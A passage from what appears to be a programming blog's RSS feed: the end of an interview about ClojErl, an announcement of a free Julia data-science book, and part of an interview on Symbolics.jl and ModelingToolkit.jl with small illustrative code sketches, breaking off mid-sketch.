&lt;p&gt;Data structures are not equivalent: Clojure’s are implemented on top of Erlang’s. All Clojure core functions related to data structures (e.g. count, first, map, etc.) work for all of Erlang’s, though, since the necessary protocols are implemented for them. It is possible to write expressions for literal Erlang data structures by using the &lt;strong&gt;#erl&lt;&#x2F;strong&gt; reader macro before a Clojure literal (e.g. &lt;strong&gt;#erl{:a 1}&lt;&#x2F;strong&gt; compiles to a literal Erlang map).&lt;&#x2F;p&gt;
&lt;p&gt;As mentioned before, ClojErl currently provides only the numerical data types available on the BEAM: integer (unbounded) and float (64 bits).&lt;&#x2F;p&gt;
&lt;p&gt;ClojErl strings are Erlang UTF-8 binaries. It is possible to write literal Erlang strings (i.e. lists of integers) by using the #erl reader macro.&lt;&#x2F;p&gt;
&lt;p&gt;Pattern matching is also available in ClojErl when using any of the special forms where bindings are created (i.e. &lt;strong&gt;fn*&lt;&#x2F;strong&gt;, &lt;strong&gt;let*&lt;&#x2F;strong&gt;, &lt;strong&gt;loop*&lt;&#x2F;strong&gt; and &lt;strong&gt;case*&lt;&#x2F;strong&gt;).&lt;&#x2F;p&gt;
&lt;p&gt;A ClojErl anonymous function can be used as an argument to any of the Erlang BIFs that expect a function, as long as the ClojErl function doesn’t use variadic arity or multiple arities. These two features are specific to Clojure, which means that Erlang code wouldn’t know how to correctly call the function in that case.&lt;&#x2F;p&gt;
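&lt;p&gt;A short hedged sketch of the interop described above (the Erlang functions called are standard stdlib; the &lt;strong&gt;#erl&lt;&#x2F;strong&gt; literal forms follow the examples given in this interview):&lt;&#x2F;p&gt;

```clojure
;; Calling Erlang functions uses the (module/function ...) form:
(erlang/length #erl(1 2 3))   ;; Erlang BIF applied to an Erlang list
(lists/reverse #erl(1 2 3))   ;; any Erlang module works the same way

;; The #erl reader macro builds literal Erlang data structures:
#erl{:a 1}    ;; an Erlang map
#erl(1 2 3)   ;; an Erlang list

;; Clojure core functions still work on Erlang data, since the
;; necessary protocols are implemented for the native types:
(count #erl{:a 1 :b 2})       ;; -> 2
```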
&lt;p&gt;The story for Elixir is similar to Erlang’s (or any other language on the BEAM). Any function from an Elixir module can be called from ClojErl. Elixir is a little particular in that all its modules have an implicit “&lt;strong&gt;Elixir.&lt;&#x2F;strong&gt;” prefix added to them by the compiler. Some people have recently been trying this out with some success (see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;marcio_lopes&#x2F;status&#x2F;1400256642478903299&quot;&gt;here&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-was-is-the-most-challenging-part-of-the-project&quot;&gt;&lt;strong&gt;What was&#x2F;is the most challenging part of the project?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;The most challenging part was and still is finding ways to reconcile what the BEAM offers with the semantics of the Clojure language. Sometimes the conclusion is that we can’t support a feature (e.g. transient collections), other times we need to provide something similar but a little more limited than the original (e.g. vars), and yet other times we add something completely new to the language because we want to have interoperability with platform features (e.g. pattern matching).&lt;&#x2F;p&gt;
&lt;p&gt;Another big challenge has been performance. Some features, when implemented on the JVM, do not translate very well to how the BEAM works (e.g. transducers), which results in much worse performance (i.e. an order of magnitude slower) than what the JVM offers. The release of OTP 24 saw the inclusion of a JIT compiler; preliminary micro-benchmarking using this release showed a lot of improvement in the run-time performance of some expressions. There is still quite a lot of work to be done performance-wise (both in time and memory usage) on ClojErl.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;are-there-currently-any-interesting-use-cases-for-clojerl&quot;&gt;&lt;strong&gt;Are there currently any interesting use cases for ClojErl?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;If we talk about production environment use cases, the short answer is no. The project is still in beta and there hasn’t been (that I know of) any company or individual that has used ClojErl in a production environment.&lt;&#x2F;p&gt;
&lt;p&gt;But there are some use cases that I have found interesting and fun.&lt;&#x2F;p&gt;
&lt;p&gt;One of them is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojerl&#x2F;doodler&quot;&gt;doodler&lt;&#x2F;a&gt;, an implementation of a canvas for creating animations inspired by the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;quil.info&#x2F;?example=fireworks&quot;&gt;quil&lt;&#x2F;a&gt; Clojure(Script) project.&lt;&#x2F;p&gt;
&lt;p&gt;Another one is the application behind &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;try.clojerl.online&#x2F;&quot;&gt;try.clojerl.online&lt;&#x2F;a&gt; which is built in ClojErl. I think I spent more time on the JS client-side console than on the code necessary to have a remote running ClojErl REPL.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;is-the-project-open-for-contributions-if-so-how-should-people-get-started&quot;&gt;&lt;strong&gt;Is the project open for contributions? If so, how should people get started?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Yes, absolutely, 100%!&lt;&#x2F;p&gt;
&lt;p&gt;There are open issues to which I haven’t had time to dedicate myself, and anyone interested in working on them, or on any other features or improvements, can reach out through the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojerl&#x2F;clojerl&quot;&gt;GitHub repository&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;jfacorro&quot;&gt;Twitter&lt;&#x2F;a&gt; or the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;erlanger.slack.com&#x2F;archives&#x2F;C7KBUEAMC&quot;&gt;#ClojErl Slack channel&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The fastest way to have a working development environment is by using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gitpod.io&#x2F;&quot;&gt;gitpod.io&lt;&#x2F;a&gt;, which provides an online IDE for any public project hosted in the major code repositories (e.g. GitHub). Firing up a new environment is as simple as following &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gitpod.io&#x2F;#github.com&#x2F;clojerl&#x2F;clojerl&quot;&gt;this link&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;How to navigate the code is a little bit more complicated because the documentation around this is lacking. There is some documentation on the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.clojerl.org&#x2F;&quot;&gt;ClojErl.org&lt;&#x2F;a&gt; page and there are also &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hexdocs.pm&#x2F;clojerl&#x2F;clj_compiler.html&quot;&gt;API docs for the Erlang modules in hex.pm&lt;&#x2F;a&gt;. But they provide a limited view and some important things are not included there, so until there is more documentation for developing ClojErl, I am available for people to reach out with their questions.&lt;&#x2F;p&gt;
&lt;p&gt;Other areas that need some love are development tools. The &lt;strong&gt;rebar3_ClojErl&lt;&#x2F;strong&gt; plugin currently provides pretty good support for compiling, testing, building applications and scripts, and starting up a REPL. The area that is not so great is editor support for ClojErl. Syntax highlighting is available and simple to get, but it would be an amazing developer experience if &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;erlang-ls&#x2F;erlang_ls&quot;&gt;&lt;strong&gt;Erlang-ls&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; could also parse ClojErl files and help navigate code in both Erlang and ClojErl.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;can-i-use-any-library-written-in-erlang-directly-in-clojerl&quot;&gt;Can I use any library written in Erlang directly in ClojErl?&lt;&#x2F;h4&gt;
&lt;p&gt;Yes! ClojErl is “just” an Erlang library, which means you can combine it with any other Erlang library and&#x2F;or application by using &lt;strong&gt;rebar3&lt;&#x2F;strong&gt; and the dedicated &lt;strong&gt;rebar3_ClojErl&lt;&#x2F;strong&gt; plugin.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>We wrote a book! “Data Science in Julia for Hackers” beta is now live and free to read</title>
          <pubDate>Fri, 19 Mar 2021 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-wrote-a-hands-on-bayesian-data-science-book-in-6-months/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-wrote-a-hands-on-bayesian-data-science-book-in-6-months/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-wrote-a-hands-on-bayesian-data-science-book-in-6-months/">&lt;h4 id=&quot;learn-about-data-science-and-julia-while-solving-real-life-problems&quot;&gt;Learn about data science and Julia while solving real-life problems&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Read our book “Data Science in Julia for Hackers” at:&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;datasciencejuliahackers.com&#x2F;&quot;&gt;&lt;strong&gt;https:&#x2F;&#x2F;datasciencejuliahackers.com&#x2F;&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-t93INVDo-XNSm7iObeXODQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;We put together this post to share the release of our first book on data science methods, which focuses on solving real-life problems. This release is actually a beta version, as we are looking to receive constructive criticism and feedback, in order to improve the book until the first revised version is ready.&lt;&#x2F;p&gt;
&lt;p&gt;We come from different backgrounds. Federico Carrone is a developer with over 15 years of experience and the founder of a startup that has been running since 2014; he is currently studying towards a degree in Mathematics. Herman Obst is an Industrial Engineer who is just learning to program, as is our Physicist, Mariano Nicolini. Martina Cantaro coordinated the writing process, and our technical consultants, Manuel Puebla and Lucas Fernández Piana, are making sure our definitions are simple to understand yet accurate.&lt;&#x2F;p&gt;
&lt;p&gt;We do not come from academia, nor are we experts in statistics, which may make some people wonder whether we have enough authority to concern ourselves with such complex issues. But we have one thing in common: above all, we are doers. Collectively, we have experience in setting ourselves big goals and achieving them through learning, hacking, tinkering and thinking. Data science is a toolkit that has enabled us to solve different real-life problems, and we want to share what we have learned in the process.&lt;&#x2F;p&gt;
&lt;p&gt;Speaking of real-life problems, few disciplines have as much impact when it comes to solving them as data science. Currently, our society is constantly generating massive amounts of information encoding complex behaviors and relationships from a wide array of fields. And people are developing the tools to use that information to our benefit.&lt;&#x2F;p&gt;
&lt;p&gt;That was why we were so struck by the fact that almost all the books on data science and statistics had a very theoretical approach, focusing on understanding the mathematics of the algorithms and never talking about their applications to situations we might encounter in work or life in general.&lt;&#x2F;p&gt;
&lt;p&gt;Because of this (and because of our love for making and generating things) we decided to embark on the adventure of writing a book. A book whose first and foremost premise was to propose diverse and interesting problems, and solve them using the ingenuity and tools of data science. And theory does not play a minor role, not at all, but it is developed only to the extent that the resolution of the problem requires it. In this way, a real connection between theory and reality is achieved.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;what-we-want-you-to-learn&quot;&gt;What we want you to learn&lt;&#x2F;h3&gt;
&lt;p&gt;One of the ideas we are most interested in conveying is that of taking action. Nowadays there is a dominant way of thinking, widespread in the academic world, which maintains that before being able to carry out any meaningful work we must first acquire a broad theoretical knowledge of the subject. We think this can be counterproductive, as it makes people afraid of taking risks and daring to immerse themselves in practice.&lt;&#x2F;p&gt;
&lt;p&gt;We decided to disprove this way of thinking by making a book about Bayesian statistics, machine learning and artificial intelligence, without (at first) knowing much about any of these fields.&lt;&#x2F;p&gt;
&lt;p&gt;That was our goal. We figured out the rest as we went along.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;what-we-learned&quot;&gt;What we learned&lt;&#x2F;h3&gt;
&lt;p&gt;With our goal always in mind, we started searching and solving a wide variety of problems that could be interesting to tackle using Bayesian inference, which at the beginning was the only topic we planned to talk about. That way we got used to the Bayesian mindset and the different probabilistic programming tools in Julia, our language of choice.&lt;&#x2F;p&gt;
&lt;p&gt;But as we progressed, we changed the focus of the book from something like “Bayesian methods from a practical perspective” to include data science topics in general, from time series prediction to the powerful Scientific Machine Learning ecosystem. Finally, although we wanted to focus on these less widespread methods, we thought it pertinent to add a section on more classical methods, such as deep learning and machine learning (the latter currently in production).&lt;&#x2F;p&gt;
&lt;p&gt;As the difficulty of the scenarios we created began to increase (we often found that a problem was far more complicated than we initially thought), it became clear that we had to incorporate more solid knowledge about Bayesianism. That’s where reading &lt;em&gt;Bayesian Methods for Hackers&lt;&#x2F;em&gt; and &lt;em&gt;Statistical Rethinking&lt;&#x2F;em&gt; gave us a much better understanding and tools to deal with the complexity.&lt;&#x2F;p&gt;
&lt;p&gt;Our writing process also got better over time. Although we already had some experience writing blog posts, writing a book was a brand new challenge for everyone, especially since we are not native English speakers.&lt;&#x2F;p&gt;
&lt;p&gt;At the beginning, our explanations of models and the theory behind them were somewhat lacking. Several pages were discarded, and the rest were re-written several times until we found them passable. It was a process that involved a fair deal of frustration, but as we iterated over them, the quality of the pages increased substantially. Finally, we found a comfort zone in terms of diagramming, coding and writing the chapters.&lt;&#x2F;p&gt;
&lt;p&gt;The road was winding, and some keys to keeping the progress up were not letting ourselves be overwhelmed by the enormous task, dividing the work, going chapter by chapter and, above all, always moving forward. One strategy we used was to write each chapter only until we felt it was 80% complete. That way, the progress curve always kept a good positive slope, since (by the Pareto principle) that last 20% would take 80% of the time to complete. Only when we had completed 80% of the book did we go back chapter by chapter to finish polishing it.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;where-you-can-read-it&quot;&gt;Where you can read it&lt;&#x2F;h3&gt;
&lt;p&gt;And that’s it! As of now, the book is up for everyone to read at:&lt;&#x2F;p&gt;
&lt;h4 id=&quot;https-datasciencejuliahackers-com&quot;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;datasciencejuliahackers.com&#x2F;&quot;&gt;https:&#x2F;&#x2F;datasciencejuliahackers.com&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;We hope it will be useful to as many people as possible and we hope to receive lots of feedback and constructive criticism, so we can keep improving edition after edition.&lt;&#x2F;p&gt;
&lt;p&gt;Enjoy!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Modeling complexity with Symbolics.jl and ModelingToolkit.jl</title>
          <pubDate>Thu, 18 Mar 2021 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/modeling-complexity-with-symbolics-jl-and-modelingtoolkit-jl/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/modeling-complexity-with-symbolics-jl-and-modelingtoolkit-jl/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/modeling-complexity-with-symbolics-jl-and-modelingtoolkit-jl/">&lt;h4 id=&quot;an-interview-with-chris-rackauckas&quot;&gt;An interview with Chris Rackauckas&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-sHzrVkhNvHxdiJ2IBmfVPA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;As we often mentioned on Not a Monad Tutorial, the world is complex, and we increasingly understand where our tools fall short when trying to model this complexity.&lt;&#x2F;p&gt;
&lt;p&gt;We’ve previously interviewed Chris Rackauckas on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;notamonadtutorial.com&#x2F;scientific-machine-learning-with-julia-the-sciml-ecosystem-b22802951c8a&quot;&gt;SciML&lt;&#x2F;a&gt;; this time he joins us to answer questions regarding new developments in the area of symbolic computation with Julia, its relation to numerical computing, causal vs acausal approaches, how these matters are represented in Symbolics.jl and ModelingToolkit.jl, and how these packages relate to the existing simulation tooling landscape.&lt;&#x2F;p&gt;
&lt;p&gt;These packages compose easily and thus allow modeling larger, more complex systems by reusing parts, as well as helping community efforts. Having these interoperable packages is key to building a modern simulation software stack which can address the aforementioned needs of complex modeling.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;what-is-symbolics-jl-what-are-the-motivations-behind-the-creation-of-the-system&quot;&gt;What is Symbolics.jl? What are the motivations behind the creation of the system?&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JuliaSymbolics&#x2F;Symbolics.jl&quot;&gt;Symbolics.jl&lt;&#x2F;a&gt; is a Computer Algebra System (CAS) in the Julia programming language developed by the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;juliasymbolics.org&#x2F;&quot;&gt;JuliaSymbolics Organization&lt;&#x2F;a&gt;. Think symbolic computation: write down equations and ask the computer to come up with symbolic solutions. It’s a modern CAS, meaning it’s built on a widely used modern programming language (Julia), making use of modern tooling like pervasive parallelism, new algorithms like E-Graphs, integration with machine learning, and more.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-modelingtoolkit-jl-what-are-the-needs-it-addresses&quot;&gt;What is ModelingToolkit.jl? What are the needs it addresses?&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;SciML&#x2F;ModelingToolkit.jl&quot;&gt;ModelingToolkit.jl&lt;&#x2F;a&gt; is an equation-based acausal modeling system. It’s similar to systems like Modelica, which allow composing models to quickly generate realistic simulations. This lets you take pre-built models created by other scientists and build complete systems. For example, you can take a high-fidelity model of an air conditioner, then make a model of a building, stick the air conditioner into the building, and ask what kind of energy efficiency you get. Then change the building to start designing what’s most efficient.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-does-acausal-modeling-relate-to-tools-like-simulink&quot;&gt;How does acausal modeling relate to tools like Simulink?&lt;&#x2F;h4&gt;
&lt;p&gt;Simulink is a causal modeling tool. You have to know “what causes what” in order to develop the simulation. This can be difficult in our complex world: the heat of the building is read by the thermostat, which turns the AC on, which then changes the heat of the building. Feedbacks and “algebraic loops” cause issues in causal modeling systems: users have to break the loops or change the model. For this reason &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;abs&#x2F;1909.00484&quot;&gt;experts consider causal modeling as not suitable for complex simulations&lt;&#x2F;a&gt;, since causal models do not compose well. This is why acausal tools like Modelica have seen a lot of adoption. Even MATLAB has an acausal tool now, Simscape. Given the advancements in these techniques, I see the next generation of engineers all using acausal tools, with ModelingToolkit.jl being one of the only fully-featured free and open-source acausal systems.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-is-symbolic-computation-needed-at-all-what-are-the-advantages-compared-to-numerical-computation-when-is-one-preferred-to-the-other&quot;&gt;Why is symbolic computation needed at all? What are the advantages compared to numerical computation? When is one preferred to the other?&lt;&#x2F;h4&gt;
&lt;p&gt;Are you sure you know enough mathematics to have written the mathematical model in the most numerically-stable form? Even if you know all of the tricks that you’re supposed to do, do you want to do it all by hand? I see the main use of symbolic computation in symbolic-numerics, i.e. using symbolic techniques to improve the models which are then used in numerical methods. For example, in a recent blog post titled &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.stochasticlifestyle.com&#x2F;generalizing-automatic-differentiation-to-automatic-sparsity-uncertainty-stability-and-parallelism&#x2F;&quot;&gt;Generalizing Automatic Differentiation to Automatic Sparsity, Uncertainty, Stability, and Parallelism&lt;&#x2F;a&gt;, I describe how a two-dimensional pendulum simulation without the small angle approximation requires a differential-algebraic equation. The intuitive model of “position moves by velocity, velocity moves by acceleration, and length is constant” is actually an unstable description of the full pendulum. You have to differentiate the “length is constant” equation twice, then substitute other relationships, and then you arrive at an “index-1” DAE which is easier to numerically solve. Even if you know enough of these details to do it, you don’t want to handle that! Symbolic-numeric computation is how we will get to a future where that is all automated.&lt;&#x2F;p&gt;
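&lt;p&gt;A minimal hedged sketch of that pendulum workflow in ModelingToolkit.jl (function names such as &lt;strong&gt;structural_simplify&lt;&#x2F;strong&gt; and &lt;strong&gt;dae_index_lowering&lt;&#x2F;strong&gt; follow its documented API and may vary across versions):&lt;&#x2F;p&gt;

```julia
using ModelingToolkit

@parameters g L
@variables t x(t) y(t) vx(t) vy(t) T(t)
D = Differential(t)

# The intuitive pendulum model: position moves by velocity, velocity
# moves by acceleration (rod tension T), and the length is constant.
eqs = [D(x) ~ vx,
       D(y) ~ vy,
       D(vx) ~ T * x,
       D(vy) ~ T * y - g,
       x^2 + y^2 ~ L^2]   # "length is constant" algebraic constraint

@named pendulum = ODESystem(eqs, t)

# Symbolically differentiate the constraint and substitute, producing
# an index-1 DAE that is easier to solve numerically:
simplified = structural_simplify(dae_index_lowering(pendulum))
```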
&lt;h4 id=&quot;wolfram-mathematica-and-sympy-in-python-are-some-of-the-most-popular-choices-when-dealing-with-symbolic-manipulation-nowadays-what-are-the-advantages-symbolics-jl-offers-in-comparison-to-them&quot;&gt;Wolfram Mathematica and SymPy in Python are some of the most popular choices when dealing with symbolic manipulation nowadays. What are the advantages Symbolics.jl offers in comparison to them?&lt;&#x2F;h4&gt;
&lt;p&gt;Symbolics.jl is being built from the ground up for speed, being built from the ground up with parallelism, and last but not least, it’s being built up from a community of tools. There is so much good stuff out there that I think it would be unreasonable to silo one’s organization off and do everything from scratch. Julia has many great initiatives like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.computeralgebra.de&#x2F;sfb&#x2F;&quot;&gt;OSCAR.jl&lt;&#x2F;a&gt; which are building fast implementations of the mathematical guts. We are using the fact that Julia is a high performance language to both develop high level interfaces and ensure that all of these tools can be used with minimal overhead, mental and computational. So while you might know nothing about Galois fields, there might be a fancy algorithm underneath the hood when you call factorize(x² + 2x + 1) that does it efficiently and scales to large systems.&lt;&#x2F;p&gt;
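&lt;p&gt;For a flavor of the symbolic layer itself, a short hedged sketch with Symbolics.jl (names follow its documented API; the exact printing of results may differ):&lt;&#x2F;p&gt;

```julia
using Symbolics

@variables x

expand((x + 1)^2)                        # x^2 + 2x + 1
simplify(2x + x)                         # 3x
Symbolics.derivative(x^2 + 2x + 1, x)    # 2x + 2
```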
&lt;h4 id=&quot;how-is-modelingtoolkit-jl-related-to-symbolics-jl-what-role-does-julia-s-composability-play-in-the-relationship-between-the-two-packages&quot;&gt;How is ModelingToolkit.jl related to Symbolics.jl? What role does Julia’s composability play in the relationship between the two packages?&lt;&#x2F;h4&gt;
&lt;p&gt;Acausal modeling requires symbolic transformations of equations. In that pendulum example, “differentiate the equation twice and substitute”, what kind of tool provides features like differentiation and high-performance equation rewriting (i.e. substitution)? A CAS! So ModelingToolkit.jl lets someone say “this is an ODE”, where its equations are described by Symbolics.jl expressions. There are then functions that do things like “transform this to index-1 form” and “analytically discover which equations are redundant and delete them”, and those transformations are written using the tools of Symbolics.jl. This means that as the CAS grows more powerful, so will ModelingToolkit.jl and its environment.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-does-modelingtoolkit-jl-compare-to-other-modeling-frameworks-such-as-modelica-and-simulink-how-easily-would-a-person-with-some-background-on-these-frameworks-adapt-to-modelingtoolkit-jl&quot;&gt;How does ModelingToolkit.jl compare to other modeling frameworks such as Modelica and Simulink? How easily would a person with some background on these frameworks adapt to ModelingToolkit.jl?&lt;&#x2F;h4&gt;
&lt;p&gt;ModelingToolkit.jl’s focus at this point has mainly been on flexibility and speed. In terms of flexibility, ModelingToolkit.jl is the only one which has a hackable compiler that allows composing transformations. All of the symbolic enhancements that are allowed in the Modelica and Simulink compilers are those that are built-in. While it sounds like that’s all that most users need, what that really does is stifle innovation. There are people working in these fields that need a common framework to build off of. Many of these researchers are now in Julia. So for example, could we add an analysis pass that automatically tells you whether you can distinguish between parameters with the data you have? Yes, anyone could extend the ModelingToolkit.jl system with a pass that does that, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;alexeyovchinnikov&#x2F;SIAN-Julia&quot;&gt;and we’re already talking with authors of Julia libraries about doing this&lt;&#x2F;a&gt;. There is so much going on in this space that it’s hard to express, but expect tons of unique transformations to be allowed on your models. “Make a model that doesn’t solve in other systems solve here” is not just a dream.&lt;&#x2F;p&gt;
&lt;p&gt;And then there’s speed. We haven’t done complete and comprehensive benchmarking against all of the systems yet, but we have seen &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;abs&#x2F;2103.05244&quot;&gt;some good performance against some Modelica compilers&lt;&#x2F;a&gt;, indicating we’re doing really well. One NASA user of ModelingToolkit.jl said &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;tQpqsmwlfY0&quot;&gt;a 15 minute Simulink simulation took 50ms in ModelingToolkit.jl&lt;&#x2F;a&gt;. A user mentioned at the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;FMVOUvWNlLE&quot;&gt;AAS&#x2F;AIAA Space Flight Mechanics meeting that in every case tested against a Fortran package with a MATLAB interface, they saw at least an order of magnitude acceleration by moving to ModelingToolkit.jl&lt;&#x2F;a&gt;. In a very early version of ModelingToolkit.jl, we did a demo with Pfizer where we &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;juliacomputing.com&#x2F;case-studies&#x2F;pfizer&#x2F;&quot;&gt;demonstrated a 175x acceleration over their original C-based simulations&lt;&#x2F;a&gt;. Part of all of this is just due to the solvers, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;benchmarks.sciml.ai&#x2F;html&#x2F;MultiLanguage&#x2F;wrapper_packages.html&quot;&gt;which benchmark really well in a cross-language way&lt;&#x2F;a&gt;. Another good chunk is due to the feature sets of the solvers, and ModelingToolkit.jl automatically enabling some of the best choices of combinations. 
This is explored a bit in a talk at JuliaCon 2020 titled &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=UNkXNZZ3hSw&quot;&gt;Auto-Optimization and Parallelism in DifferentialEquations.jl&lt;&#x2F;a&gt;, which was the video that announced the release of ModelingToolkit.jl as a new front end to the solvers for further improving speed.&lt;&#x2F;p&gt;
&lt;p&gt;That said, we have focused so far on the details. We want the biggest, hardest models with the users who have the most demands. These other tools have put a lot more time into user interface, specifically graphical user interfaces (GUIs). Modelica and Simulink have a lot of tooling for drag-and-drop model building, and they ship with large libraries of premade components. But, this will change very soon. Keep your eyes peeled for some announcements.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-the-main-challenges-to-solve-in-order-to-build-such-a-high-level-modeling-library&quot;&gt;What are the main challenges to solve in order to build such a high level modeling library?&lt;&#x2F;h4&gt;
&lt;p&gt;You want to make the modeling language expressive enough so that every detail you can mathematically specialize on and optimize for is there, but you also want to make it easy for users to actually use. Striking that balance is difficult. ModelingToolkit.jl spent around 4 years in various prototype forms, going through and breaking designs, until we found one that could actually solve the problem to the level we hoped.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-is-julia-code-generated-from-symbolic-expressions&quot;&gt;How is Julia code generated from symbolic expressions?&lt;&#x2F;h4&gt;
&lt;p&gt;The symbolic expressions use the same exact pieces under different semantics. For example, square roots in the model are &lt;code&gt;sqrt&lt;&#x2F;code&gt; in Symbolics.jl and &lt;code&gt;sqrt&lt;&#x2F;code&gt; in Julia. This means all we have to do is take the symbolic expression, write it into a Julia function, and invoke the compiler. Invoking compilation on the fly as part of a symbolic language is an interesting challenge though, something that a tool like SymPy skips but which reduces speed by orders of magnitude. The specific details of this are pretty esoteric so I will spare you, but to make this all work we created a new hook into the Julia compiler called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;SciML&#x2F;RuntimeGeneratedFunctions.jl&quot;&gt;RuntimeGeneratedFunctions&lt;&#x2F;a&gt; which allows for staged compilation that composes with garbage collection, making generated code safe.&lt;&#x2F;p&gt;
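&lt;p&gt;As a rough illustration of that translation step (a toy Python sketch of the same idea, not Symbolics.jl’s actual machinery; all helper names here are made up): walk a symbolic expression tree, emit source code in which each function means the same thing it meant symbolically, and compile that source at runtime.&lt;&#x2F;p&gt;

```python
import math

# A tiny symbolic expression as a nested tuple tree:
# ("mul", ("sym", "x"), ("call", "sqrt", ("sym", "y")))  means  x * sqrt(y)
expr = ("mul", ("sym", "x"), ("call", "sqrt", ("sym", "y")))

def to_source(node):
    """Emit source code for a node. Because `sqrt` means the same thing
    symbolically and numerically, translation is a direct syntax mapping."""
    kind = node[0]
    if kind == "sym":
        return node[1]
    if kind == "mul":
        return f"({to_source(node[1])} * {to_source(node[2])})"
    if kind == "call":
        return f"math.{node[1]}({to_source(node[2])})"
    raise ValueError(f"unknown node kind: {kind}")

def compile_expr(node, args):
    # Generate a function definition as text and compile it on the fly,
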